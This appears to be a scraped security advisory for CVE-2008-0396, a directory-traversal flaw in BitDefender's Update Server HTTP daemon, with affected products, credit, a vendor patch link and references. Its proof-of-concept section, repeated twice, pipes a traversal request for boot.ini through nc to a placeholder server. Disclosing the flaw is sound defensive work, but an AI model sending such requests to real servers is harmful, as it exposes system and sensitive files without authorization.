BitDefender Products Update Server HTTP Daemon Directory Traversal Vulnerability
BID:27358
Info
BitDefender Products Update Server HTTP Daemon Directory Traversal Vulnerability
| Bugtraq ID: | 27358 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0396 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 19 2008 12:00AM |
| Updated: | Jan 31 2008 04:37PM |
| Credit: | Oliver Karow discovered this issue. |
| Vulnerable: |
BitDefender Enterprise Manager 0 BitDefender BitDefender Security for File Servers 0 |
| Not Vulnerable: | |
Discussion
BitDefender Products Update Server HTTP Daemon Directory Traversal Vulnerability
BitDefender Update Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue allows an attacker to access potentially sensitive information that could aid in further attacks.
BitDefender Security for File Servers, BitDefender Enterprise Manger, and other BitDefender products that include the Update Server are vulnerable. This issue affects Update Server when running on Windows; Linux and UNIX variants may also be affected.
BitDefender Update Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue allows an attacker to access potentially sensitive information that could aid in further attacks.
BitDefender Security for File Servers, BitDefender Enterprise Manger, and other BitDefender products that include the Update Server are vulnerable. This issue affects Update Server when running on Windows; Linux and UNIX variants may also be affected.
Exploit / POC
BitDefender Products Update Server HTTP Daemon Directory Traversal Vulnerability
An attacker can exploit this issue via a browser.
The following proof of concept is available:
echo -e "GET /../../boot.ini HTTP/1.0\r\n\r\n" | nc <server> <port>
An attacker can exploit this issue via a browser.
The following proof of concept is available:
echo -e "GET /../../boot.ini HTTP/1.0\r\n\r\n" | nc <server> <port>
Solution / Fix
BitDefender Products Update Server HTTP Daemon Directory Traversal Vulnerability
Solution:
The vendor released a patch to address this issue. Please see the references for more information.
BitDefender Enterprise Manager 0
Solution:
The vendor released a patch to address this issue. Please see the references for more information.
BitDefender Enterprise Manager 0
-
BitDefender httpsvrpch.exe
http://www.bitdefender.com/files/KnowledgeBase/file/httpsvrpch.exe
References
BitDefender Products Update Server HTTP Daemon Directory Traversal Vulnerability
References:
References:
- BitDefender Homepage (BitDefender)
- Vulnerability fixed in BitDefender Update Server (BitDefender)
- BitDefender Update Server - Unauthorized Remote File Access Vulnerability ("oliver karow"
)